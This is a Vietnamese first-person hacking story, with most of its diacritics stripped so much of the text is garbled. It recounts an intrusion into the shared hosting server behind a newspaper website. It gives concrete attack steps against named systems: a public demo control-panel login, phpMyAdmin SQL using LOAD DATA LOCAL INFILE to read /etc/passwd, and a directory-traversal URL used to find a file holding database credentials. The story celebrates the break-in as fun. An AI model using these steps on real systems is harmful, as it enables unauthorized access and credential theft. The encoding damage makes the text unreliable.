Hay vao va tao mot thu muc HKC-LPTV. A quen, de an toan anh em len dung cac Proxy
de truy zdo may nay.
Sao mt thi gian bn rn...m tin v *chi dzi* (anyway, for those who really want
to know what I have done in the last three months, pay a visit to http://www.phpmvc.net ,
a PHP port of Jakarta Struts), nay mrro mi rnh ri c i cht, m tht ra l do hm
nay ngi lt lt li my ci folder c ghi du *mt thi tung honh* hi trc, bt cht
gp li mt ci file cng vui vui nn em y k cho mi ngi cng nghe. Hihi vui l
chnh thi nhen.

Mt pht cho lut chi: tt c cc thng tin v li bo mt trong bi vit ny u c

thng bo cho nhng bn lin quan v n thi im ny th nhng l hng c
sa cha. (trong bi vit ny c mt s on h cu thm).
No chng ta cng bt u....
Hi 1: Ba bn tng la, chuyn nghip lm, dn amatuer lm sao hack ni!
Mt ngy ti tri u thng 8 nm ngoi, ang ngi trong phng lm vic ta son Tui
Tr, bt cht c ngi bc vo, h th ra l sp ph tng bin tp, i cng vi sp cn c
hai ba ngi khc na, nghe ni l ng nghip bn bo Si Gn Gii Phng sang chi.
"N gii thiu vi cc anh, hacker ca Tui Tr n", va ni sp va ch thng v mnh.
Tri i, ngi mun cht! T trc ti gi, thng mrro s nht 2 chuyn (1) ai hi "eh
bit hack Yahoo! Mail hng?" (2) b ngi ta ku l hacker.
Thi bui g khng bit, *hacker* cn qu hn vng , mi nghe nhc ti ch *hacker*,
mt ng bn SGGP nhy vo b vai, nhn chm chm vo mt thng mrro (coi coi n
ging ngi khng?! ). "Chc li sp ku hack ci ny ci n na ri n", thng mrro
thm chi ra. Y nh rng:
- Hacker h? Ba no th hack ci www.sggp.org.vn xem, c hack thoi mi i, ph cho
h cng c, hihi, bn anh cng ang mun lm li ci website . Ba nh bo va ni
va ci nham nh.
-Tri i, ng nghe sp em ni, em c bit hack hic g u. Thng mrro p ng tr li.
-h ni chi thi, dn amatuer lm sao hack ni, ci website ca SGGP l do bn VDC
lm y nh, chuyn nghip cc k, my ch bn xy 3-4 ci g, ci g, h nh ri bc
tng la , bo mt cc k, t trc gi cha bao gi b tn cng g ht.
Ba nh bo h hng khoe. C ci g ran rt nng l tai thng mrro.
Va dt xe v nh, kha ca li, thng mrro lp tc chy ln m my tnh lin, "m kip,
coi ba ci bc tng la n chc c no", thng mrro chi ra. "T te t te", ting
modem gia m khuya nghe nh ting n lc huyn cm, nghe cng vui tai gh.
"www.sggp.org.vn[enter]", trc tin phi xem xem ci website n ra sao . h mt site
tin tc nh bao website khc, vit bng PHP, hihi, tn scriptname cng l tn ting Vit
(doctintuc.php thay v nn l readnews.php), trnh by n gin, khng chuyn nghip
lm c l do c lm t lu, theo nh li ng nh bo ni. Hh, li sp c chuyn
vui, mt website bn ngoi lm thm kiu ny th bn trong chc cng c c vi ba ci
fireware...giy, thng mrro ci.
Ln Netcraft xem th ci server t no, "www.netcraft.com/whats". h mt my ch chy
RedHat Linux 7.2 vi Apache 1.3.23/mod_php4. Hihi, software cng khng c
*up2date* cho lm nh, h cng phi KISS (Keep It Simple, Stupid!), my lo admin
thng tun th theo ci rule ny. Thi k, tnh sau, dn *amatuer* nh thng mrro

khng c thi quen hack bng cc li software h thng, n thch hack bng li ca my
thng admin v programmer *chuyn nghip* hn.
Thao tc vi ba ci URL, n nhanh chng nhn ra website ny dng Oracle lm backend
database. PHP v Oracle, mt s kt hp th v nh. Cha c nhiu kinh nghim hack cc
Oracle database server nhng thng mrro ghi vo file sggp.org.vn.txt thng tin ny khi
cn thit th dng n(hihi, mi mt ln lm chuyn g thng mrro iu ghi li vo mt
file, v ci file m n gp li hm nay chnh l file sggp.org.vn.txt ny).
nmap ch? Khoan vi . Gh thm bn Google t . Thng mrro g vo keyword
VDC Hosting, website ny thu host VDC m, th vn may xem. h, hin ra ngay v
tr th nht: TeleHosting <http://hosting.vnn.vn>. Th gh v chi xem c g th v
khng.
h, mt website trng cng c, trnh by gn gng. Lm mt s thao tc, thng mrro
i tn file sggp.org.vn.txt li thnh hosting.vnn.vn.txt v ghi thm vo mt s thng
tin(tt c thng tin ny iu c th c tm thy ngay Index v trn Netcraft):
-Telehosting: <http://hosting.vnn.vn>
- IP address: 203.162.96.70 (cng IP vi sggp.org.vn => shared hosting)
-Apache/2.0.47 (Unix) PHP/4.3.0 JRun/4.0 mod_jk/1.2.3-dev on Linux
-Control Panel: <http://hosting.vnn.vn/customers/>
-Demo account: cpvdc2/demo
Hihi, chuyn nghip nh, cho c demo account th h. Thng mrro th truy cp vo
Control Panel bng ci account . Thng Control Panel cung cp mt s cng c qun l
nh Cp nht thng tin, Gi th yu cu, FTP, FileManager, MySQL,WebmailHi b
nhiu nh. Hh, coi b ngon n h. Thng mrro h hng nhy vo th ci FTP,
*Permission denied*. Ti lt thng FileManager cng vy. Nhng ri v cu tinh cng
n, thng MySQL cho php truy cp, hihi, n dn thng mrro n phpMyAdmin b
cng c qun l MySQL. Coi nh xong na chng ng ri, thng mrro ci ha h .
Thng mrro t tin nh vy l cng c l do, vi MySQL v phpMyAdmin, n c th lm
c khi chuyn vi ci server ny. Bi n gin n c th chy c cc cu lnh
query trn my ch ny ri. V li, phpMyAdmin version c nh th ny (2.3.2) th chc
chn s c li, ai bit c nhiu khi may mn s c c li cho php n chy lnh trn
server ny. Gi search li phpMyAdmin trc hay hack thng MySQL trc y? Sao
khng lm song song nh, hihi, chc s c li hn. Ngh l lm, thng mrro m hai ca s
browser ln (FYI, its Firefox), mt ci n nhy vo Bugtraq search vi t kha
phpMyAdmin, mt ci n login vo phpMyAdmin vi account demo.
Vo trong phpMyAdmin ri, nhanh nh c lp trnh sn, thng mrro g cu lnh
query:
CREATE TABLE test(id INT,text LONGTEXT);
LOAD DATA LOCAL INFILE /etc/passwd INTO TABLE test FIELDS ESCAPE BY
;
SELECT * FROM test;

v enter, mt mn hnh hin y cc username c trong h thng hin ra ngay trc

mt n, yahoo! Hihi, vi phpMyAdmin ny th thng mrro s c th c c nhiu file
trong h thng lm h.
Cn thn lu li cc thng tin ny, gi mc tiu l g?, thng mrro t hi. Phi upload
c file ln hoc phi ly c username v passwd ca mt user trong h thng. N
bt u phn tch.
Vi mt ci my ch shared hosting nh th ny, chc chn s c trng hp username
v passwd trng nhau. l mt hng.
Hng th hai l truy cp vo database cha d liu v khch hng. Khi truy cp vo
database ny c ri th mi chuyn s tr nn rt d dng, chc chn trong s c y
username v passwd m thng mrro cn tm. Cc tay admin *chuyn nghip* ny th
no cng s vit mt cng c qun l khch hng cho ring mnh, gi ch cn bit c
MySQL username v passwd truy cp vo database l xong. M thng th
username v passwd ny s c lu trong mt file config.php no , cc tay vit PHP
vn thng lm vy. Hihi, vn duy nht cn li l lm sao bit ng dn ca file .
Thng mrro quyt nh i theo hng th hai trc n gin v hng i ny coi b hp
dn hn, mc d i theo hng th nht th c v s d dng hn. Gi lm g tip theo?
h khoan, phi xem xem c tm c g bn Bugtraq hng . h cng c mt vi li,
coi b khng nng lm, hnh nh ton XSS khng. Va nh tt ca s Bugtraq i (g ch
thng mrro cng khng thch ba ci v ny lm) th mt ci li p vo mt thng mrro.
phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack ,
Information Encoding Weakness and Path Disclosures (
http://www.securityfocus.com/archive/1/325641 ).
Path Disclosures v Transversal Directory Attack, hehe, v ny hay h. Lu li ng
link xong, thng mrro click vo xem chi tit ci li. Ri xong, ht phim! Ci li
Transversal Directory attack cho php c ni dung (bao gm file v subfolder) ca mt
folder bt k trong h thng (chnh xc l folder no cho php user apache c). Nhanh
chng li dng li ny, cng vi ci Path Disclosures, thng mrro g
http://hosting.vnn.vn/Admin/db_details_imp...ath=/opt/daiweb
<http://hosting.vnn.vn/Admin/db_details_importdocsql.php?submit_show=true&do=imp
ort&docpath=/opt/daiweb>
Hehe chnh nh mt ng trc mt mt ci file mang tn connect.php ng nh thng
mrro d on. Li dng chiu LOAD DATA INFILE, v ht!
--mrro.
c xong bi vit ny bn c cm gic g ?? Vui khng ? Ti thy rt vui, n lm cho ti
vn thy hacking rt vui nay li cng vui hn. Hacker ( hay nhng ngi bit hack)
tht s VN khng my ai khi hack xong m vit tut li vui v th ny u. Trc y

Huyremy c ln vit li qu trnh hack HVA nhng khng vui cho lm, v li Huy cng
vit c mi 1 ci thi ....Khi no tm c bi vit no vui th ny ti s li gii thiu
vi cc bn ! Chc vui v !
The End